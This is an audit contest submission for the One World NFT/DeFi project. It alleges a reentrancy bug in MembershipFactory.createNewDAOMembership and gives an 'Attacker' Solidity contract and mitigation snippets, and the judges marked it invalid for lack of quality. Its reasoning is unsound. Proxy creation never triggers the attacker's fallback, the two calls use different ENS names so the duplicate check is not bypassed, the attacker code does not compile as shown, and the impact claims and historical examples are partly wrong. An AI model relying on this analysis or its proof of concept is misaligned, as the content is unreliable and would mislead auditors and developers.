Project
One World
NFTDeFi
15,000 USDC
View results
Previous Next
Submission Details
Severity: high
Invalid

Reentrancy Vulnerability Specific to getENSAddress mapping

nitinaimshigh

Summary: The contract code is given below..

In the createNewDAOMembership function, getENSAddress is used to store the address of the newly created proxy contract. Here’s how it becomes vulnerable to reentrancy:

/////code of contract//////
mapping(string => address) public getENSAddress;
/////more code///////
function createNewDAOMembership(DAOInputConfig calldata daoConfig, TierConfig\[] calldata tierConfigs)\
external returns (address) {\
require(getENSAddress\[daoConfig.ensname] == address(0), "DAO already exists.");
-
// External call to create a new proxy contract
TransparentUpgradeableProxy proxy = new TransparentUpgradeableProxy(
membershipImplementation,
address(proxyAdmin),
abi.encodeWithSignature("initialize(string,string,string,address,address)", daoConfig.ensname, "OWP", baseURI, msg.sender, daoConfig.currency)
);
// Other state updates
DAOConfig storage dao = daos[address(proxy)];
dao.ensname = daoConfig.ensname;
dao.daoType = daoConfig.daoType;
dao.currency = daoConfig.currency;
for (uint256 i = 0; i < tierConfigs.length; i++) {
require(tierConfigs[i].minted == 0, "Invalid tier config");
dao.tiers.push(tierConfigs[i]);
}
// State update after the external call
getENSAddress[daoConfig.ensname] = address(proxy);
userCreatedDAOs[msg.sender][daoConfig.ensname] = address(proxy);
emit MembershipDAONFTCreated(daoConfig.ensname, address(proxy), dao);
return address(proxy);}
//MembershipFactory.getENSAddress (contracts/dao/MembershipFactory.sol#23) can be used in cross function reentrancies
}
//////more code/////

Vulnerability Details: External Call:

  • The creation of the TransparentUpgradeableProxy involves an external call:

    TransparentUpgradeableProxy proxy = new TransparentUpgradeableProxy(
    membershipImplementation,
    address(proxyAdmin),
    abi.encodeWithSignature("initialize(string,string,string,address,address)", daoConfig.ensname, "OWP", baseURI, msg.sender, daoConfig.currency)
    );

  • Reentrancy Window:

    • During this external call, control is transferred to the newly created proxy contract.

    • If the proxy contract or the initialization logic includes a callback to the createNewDAOMembership function, it can re-enter before the state variable getENSAddress is updated.

  • State Update:

    • The state variable getENSAddress is updated after the external call:

      getENSAddress[daoConfig.ensname] = address(proxy);

    • If reentrancy occurs, the require check at the beginning of the function (require(getENSAddress[daoConfig.ensname] == address(0), "DAO already exists.");) could be bypassed, allowing the creation of multiple proxies for the same ensname.

Impact: Reentrancy vulnerabilities are critical security issues in smart contracts, allowing attackers to exploit recursive calls to manipulate contract states or drain funds. Here is a detailed analysis of the potential impacts specific to the createNewDAOMembership function in your MembershipFactory contract:

Potential Impacts

  1. Creation of Multiple DAO Proxies for the Same ENS Name:

    • Scenario: An attacker could recursively call createNewDAOMembership before the state variable getENSAddress is updated.

    • Impact: This could lead to the creation of multiple proxy contracts for the same ENS name, resulting in a significant disruption of the DAO’s structure and governance.

  2. Inconsistent State:

    • Scenario: During the reentrant call, the state of the contract might not be consistent with its intended logic.

    • Impact: This can cause the contract to behave unpredictably, leading to governance issues within the DAO. For example, the same ENS name could be associated with different DAOs, causing confusion and potential conflicts.

  3. Unauthorized Access:

    • Scenario: If the function re-enters, the attacker might bypass access control mechanisms.

    • Impact: This can allow unauthorized users to create, update, or manage DAOs, leading to a compromise in the contract’s security and the DAO's integrity.

  4. Denial of Service (DoS) Attacks:

    • Scenario: An attacker could exploit the reentrancy to repeatedly call the function, thereby consuming gas and resources.

    • Impact: This can lead to a Denial of Service (DoS), making the contract unusable for legitimate users and potentially leading to a halt in DAO operations.

  5. Financial Loss:

    • Scenario: Manipulation of state variables through reentrancy could lead to incorrect handling of funds.

    • Impact: This can result in financial loss for the DAO members, either by misallocation of funds or by draining the contract’s balance.

Example Attack Scenario

  1. Initial Call:

    • The attacker calls createNewDAOMembership to create a new DAO with a specific ENS name.

  2. During the External Call:

    • While the TransparentUpgradeableProxy contract is being created, control is transferred to the external proxy contract.

  3. Reentering the Function:

    • The malicious proxy contract calls back into the createNewDAOMembership function before the original execution completes.

  4. Multiple Proxies Creation:

    • By reentering the function, the attacker can bypass the initial check (require(getENSAddress[daoConfig.ensname] == address(0), "DAO already exists.");), allowing multiple proxies for the same ENS name.

Real-World Examples

Reentrancy attacks have led to significant financial losses and disruptions in the past:

  • The DAO Attack (2016): An infamous reentrancy attack that resulted in approximately $50 million worth of Ether being siphoned off from the DAO, leading to a hard fork in the Ethereum blockchain.

  • Parity Wallet Vulnerability (2017): A critical vulnerability caused by reentrancy led to the freezing of funds worth millions of dollars.

Proof of Concept Code: Here’s a proof of concept demonstrating a reentrancy attack on the createNewDAOMembership function in the MembershipFactory contract and the corresponding Attacker contract to exploit this vulnerability.

Vulnerable MembershipFactory Contract

This contract is susceptible to reentrancy attacks due to the sequence of state updates and external calls:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;
import "@openzeppelin/contracts/access/AccessControl.sol";
import "@openzeppelin/contracts/proxy/transparent/TransparentUpgradeableProxy.sol";
contract MembershipFactory is AccessControl {
bytes32 public constant EXTERNAL_CALLER = keccak256("EXTERNAL_CALLER");
mapping(address => DAOConfig) public daos;
mapping(string => address) public getENSAddress;
mapping(address => mapping(string => address)) public userCreatedDAOs;
struct TierConfig {
uint256 amount;
uint256 minted;
string configData;
}
struct DAOInputConfig {
string ensname;
string daoType;
address currency;
}
struct DAOConfig {
string ensname;
string daoType;
address currency;
uint256 maxMembers;
uint256 noOfTiers;
TierConfig[] tiers;
}
event MembershipDAONFTCreated(string ensname, address proxy, DAOConfig dao);
address public membershipImplementation;
address public proxyAdmin;
string public baseURI;
constructor(address _membershipImplementation, address _proxyAdmin, string memory _baseURI) {
_grantRole(DEFAULT_ADMIN_ROLE, msg.sender);
membershipImplementation = _membershipImplementation;
proxyAdmin = _proxyAdmin;
baseURI = _baseURI;
}
function createNewDAOMembership(DAOInputConfig calldata daoConfig, TierConfig[] calldata tierConfigs)
external returns (address) {
require(getENSAddress[daoConfig.ensname] == address(0), "DAO already exists.");
TransparentUpgradeableProxy proxy = new TransparentUpgradeableProxy(
membershipImplementation,
address(proxyAdmin),
abi.encodeWithSignature("initialize(string,string,string,address,address)", daoConfig.ensname, "OWP", baseURI, msg.sender, daoConfig.currency)
);
DAOConfig storage dao = daos[address(proxy)];
dao.ensname = daoConfig.ensname;
dao.daoType = daoConfig.daoType;
dao.currency = daoConfig.currency;
for (uint256 i = 0; i < tierConfigs.length; i++) {
require(tierConfigs[i].minted == 0, "Invalid tier config");
dao.tiers.push(tierConfigs[i]);
}
getENSAddress[daoConfig.ensname] = address(proxy);
userCreatedDAOs[msg.sender][daoConfig.ensname] = address(proxy);
emit MembershipDAONFTCreated(daoConfig.ensname, address(proxy), dao);
return address(proxy);
}
}

Attacker Contract:

This contract is designed to exploit the reentrancy vulnerability:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;
import "./MembershipFactory.sol";
contract Attacker {
MembershipFactory public membershipFactory;
bool public attackStarted;
constructor(address _membershipFactoryAddress) {
membershipFactory = MembershipFactory(_membershipFactoryAddress);
}
fallback() external payable {
if (attackStarted) {
attackStarted = false;
membershipFactory.createNewDAOMembership(
DAOInputConfig("maliciousDao", "SPONSORED", address(this)),
new MembershipFactory.TierConfig[](1)
);
}
}
function attack() public {
attackStarted = true;
membershipFactory.createNewDAOMembership(
DAOInputConfig("initialDao", "SPONSORED", address(this)),
new MembershipFactory.TierConfig[](1)
);
}
}

Explanation

  • MembershipFactory Contract: This contract has a vulnerability in the createNewDAOMembership function, where the state variable getENSAddress is updated after the creation of a proxy contract, making it susceptible to reentrancy attacks.

  • Attacker Contract:

    • Constructor: Initializes the contract with the address of the MembershipFactory.

    • Fallback Function: This function is triggered whenever the contract receives Ether. It re-enters the createNewDAOMembership function if attackStarted is true.

    • Attack Function: Initiates the attack by setting attackStarted to true and calling createNewDAOMembership on the MembershipFactory.

Tools Used: VS code

Recommendations: Mitigating reentrancy vulnerabilities in smart contracts is crucial to ensure their security and integrity. Here are the steps to effectively mitigate reentrancy attacks, focusing on the createNewDAOMembership function within your MembershipFactory contract:

Steps to Mitigate Reentrancy Attacks

1. Use Reentrancy Guards

Reentrancy guards are mechanisms that prevent a function from being re-entered while it is still executing. OpenZeppelin’s ReentrancyGuard is a popular and effective tool for this purpose.

Implementing ReentrancyGuard

  1. **Import and Inherit **ReentrancyGuard: Start by importing ReentrancyGuard from OpenZeppelin and inheriting it in your contract.

    import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
    contract MembershipFactory is AccessControl, ReentrancyGuard {
    // Your contract code

  2. Apply nonReentrant Modifier: Use the nonReentrant modifier on functions that need protection from reentrancy attacks. This modifier ensures the function cannot be called while it is still executing.

    function createNewDAOMembership(DAOInputConfig calldata daoConfig, TierConfig[] calldata tierConfigs)
    external nonReentrant returns (address) {
    require(getENSAddress[daoConfig.ensname] == address(0), "DAO already exists.");
    TransparentUpgradeableProxy proxy = new TransparentUpgradeableProxy(
    membershipImplementation,
    address(proxyAdmin),
    abi.encodeWithSignature("initialize(string,string,string,address,address)", daoConfig.ensname, "OWP", baseURI, msg.sender, daoConfig.currency)
    );
    DAOConfig storage dao = daos[address(proxy)];
    dao.ensname = daoConfig.ensname;
    dao.daoType = daoConfig.daoType;
    dao.currency = daoConfig.currency;
    for (uint256 i = 0; i < tierConfigs.length; i++) {
    require(tierConfigs[i].minted == 0, "Invalid tier config");
    dao.tiers.push(tierConfigs[i]);
    }
    getENSAddress[daoConfig.ensname] = address(proxy);
    userCreatedDAOs[msg.sender][daoConfig.ensname] = address(proxy);
    emit MembershipDAONFTCreated(daoConfig.ensname, address(proxy), dao);
    return address(proxy);
    }

2. Ensure Safe External Calls

External calls can transfer control to external contracts, making them a potential vector for reentrancy attacks. Ensure that these calls are safe by using robust mechanisms to handle them.

Using SafeERC20

For token transfers, use OpenZeppelin's SafeERC20 library to ensure that token operations are performed securely and revert on failure.

  1. Import SafeERC20:

    import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

  2. Using SafeERC20:

    using SafeERC20 for IERC20;
    function joinDAO(address daoMembershipAddress, uint256 tierIndex) external nonReentrant {
    require(daos[daoMembershipAddress].noOfTiers > tierIndex, "Invalid tier.");
    require(daos[daoMembershipAddress].tiers[tierIndex].amount > daos[daoMembershipAddress].tiers[tierIndex].minted, "Tier full.");
    uint256 tierPrice = daos[daoMembershipAddress].tiers[tierIndex].price;
    uint256 platformFees = (20 * tierPrice) / 100;
    daos[daoMembershipAddress].tiers[tierIndex].minted += 1;
    IERC20(daos[daoMembershipAddress].currency).safeTransferFrom(_msgSender(), owpWallet, platformFees);
    IERC20(daos[daoMembershipAddress].currency).safeTransferFrom(_msgSender(), daoMembershipAddress, tierPrice - platformFees);
    IMembershipERC1155(daoMembershipAddress).mint(_msgSender(), tierIndex, 1);
    emit UserJoinedDAO(_msgSender(), daoMembershipAddress, tierIndex);
    }

3. Ensure Proper State Management

Manage the state updates carefully, ensuring they are done in a way that prevents inconsistent states.

  1. Perform State Updates Before External Calls: Updating state variables before making external calls can reduce the attack surface for reentrancy.

    function joinDAO(address daoMembershipAddress, uint256 tierIndex) external nonReentrant {
    require(daos[daoMembershipAddress].noOfTiers > tierIndex, "Invalid tier.");
    require(daos[daoMembershipAddress].tiers[tierIndex].amount > daos[daoMembershipAddress].tiers[tierIndex].minted, "Tier full.");
    uint256 tierPrice = daos[daoMembershipAddress].tiers[tierIndex].price;
    uint256 platformFees = (20 * tierPrice) / 100;
    daos[daoMembershipAddress].tiers[tierIndex].minted += 1;
    // State updates before external calls
    IERC20(daos[daoMembershipAddress].currency).safeTransferFrom(_msgSender(), owpWallet, platformFees);
    IERC20(daos[daoMembershipAddress].currency).safeTransferFrom(_msgSender(), daoMembershipAddress, tierPrice - platformFees);
    IMembershipERC1155(daoMembershipAddress).mint(_msgSender(), tierIndex, 1);
    emit UserJoinedDAO(_msgSender(), daoMembershipAddress, tierIndex);
    }

Summary

Mitigating reentrancy attacks involves:

  1. Using Reentrancy Guards: Implement the ReentrancyGuard and apply the nonReentrant modifier to critical functions.

  2. Ensuring Safe External Calls: Use libraries like SafeERC20 to handle token transfers securely.

  3. Proper State Management: Update state variables before making external calls to reduce the attack surface.

By following these practices, you can significantly enhance the security and robustness of your smart contracts, protecting them from reentrancy attacks.

Updates

Lead Judging Commences

0xbrivan2 Lead Judge about 1 year ago
Submission Judgement Published
Invalidated
Reason: Lack of quality
0xbrivan2 Lead Judge about 1 year ago
Submission Judgement Published
Invalidated
Reason: Lack of quality

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!